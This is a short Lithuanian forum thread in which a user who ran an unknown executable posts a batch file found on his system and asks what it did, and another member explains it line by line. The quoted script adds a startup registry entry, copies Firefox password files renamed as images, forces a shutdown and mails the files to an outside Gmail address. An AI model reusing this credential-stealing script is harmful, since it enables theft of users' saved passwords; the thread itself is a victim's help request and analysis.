Padekit del bat failo.

Hakeriai dalinkitės patirtimi
Skelbti atsakymą
Žinutė
Autorius
Mesinikas
Pranešimai:2
Užsiregistravo:2009 02 13 21:46
Padekit del bat failo.

#1 Standartinė Mesinikas » 2009 02 13 21:54

sveiki. as atsidariau neaisku exe faila ir isijunge kompas. Pasiseke kad ijungiau. tempuose radau b2e.dll ir crack.bat faila jame yra
@echo off
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v systemdriver /t REG_SZ /d HDD.bat /f > nul
start setup.exe
chdir %userprofile%\Application Data\Mozilla\Firefox\Profiles\*.default
copy key3.db C:\masterx.jpg
copy signons3.txt C:\phazex.jpg
copy key.db C:\masterx.jpg
copy signons.txt C:\phazex.jpg
shutdown -s -t 20 -c "system need restart"
"%systemroot%\device\febootimail" -FROM Masterx.topsecret@gmail.com -TO Masterx.topsecret@gmail.com -MSG "firefox" -ATTACH C:\phazex.jpg -ATTACH C:\masterx.jpg -SMTP gmail-smtp-in.l.google.com
ipconfig /release
exit

gal kas galit parasyt ka tas virusas padare?

aufliger
Pranešimai:4
Užsiregistravo:2009 01 06 13:26

Re: Padekit del bat failo.

#2 Standartinė aufliger » 2009 02 19 16:18

Tiksliai nežinau, bet pabandysiu paaiškinti.

Kodas: Pasirinkti visus

reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v systemdriver /t REG_SZ /d HDD.bat /f > nul
Programa yra paleidžiama, kažkur sisteminiuose failuose, neva tai draiveriai kažkokie...

Kodas: Pasirinkti visus

%userprofile%\Application Data\Mozilla\Firefox\Profiles\*.default
Čia yra tavo naršyklės direkroija, t.y. kelias, kur yra saugomi/laikomi naršyklės failai, kurie yra vienaip ar kitaip susiję su tavo naršymu internete...

Iš ankščiau minėtos direktorijos yra kopinami failai (key3.db, sigons3.txt ir t.t):

Kodas: Pasirinkti visus

copy key3.db C:\masterx.jpg
copy signons3.txt C:\phazex.jpg
copy key.db C:\masterx.jpg
copy signons.txt C:\phazex.jpg
Turinys esantis tuose failuose (key3.db, sigons3.txt ir t.t) yra perkeliamas į masterx.jpg ir phazex.jpg . Po šios operacijos įvykdymo tau išmeta lenetelę, kad reikalingas kompiuterio perkrovimas. Po 20sek. tavo PC išsijungia.

Veliau, tie du failai (*.jpg) su pavogtu turiniu iš tavo PC, keliauja pas bat skripto kurėją, tiesiai į jo pašto dežutę. Štai ir viskas.
Na, nežinau ar čia teisingai paaiškinau tau, bet daugmaž viskas būtų taip...

Mesinikas
Pranešimai:2
Užsiregistravo:2009 02 13 21:46

Re: Padekit del bat failo.

#3 Standartinė Mesinikas » 2009 02 20 19:55

ok aciu. gerai kad neatjunge kokios peles arba boot.ini failo neistryne :D

Skelbti atsakymą

Grįžti į

Dabar prisijungę

Vartotojai naršantys šį forumą: 3 ir 0 svečių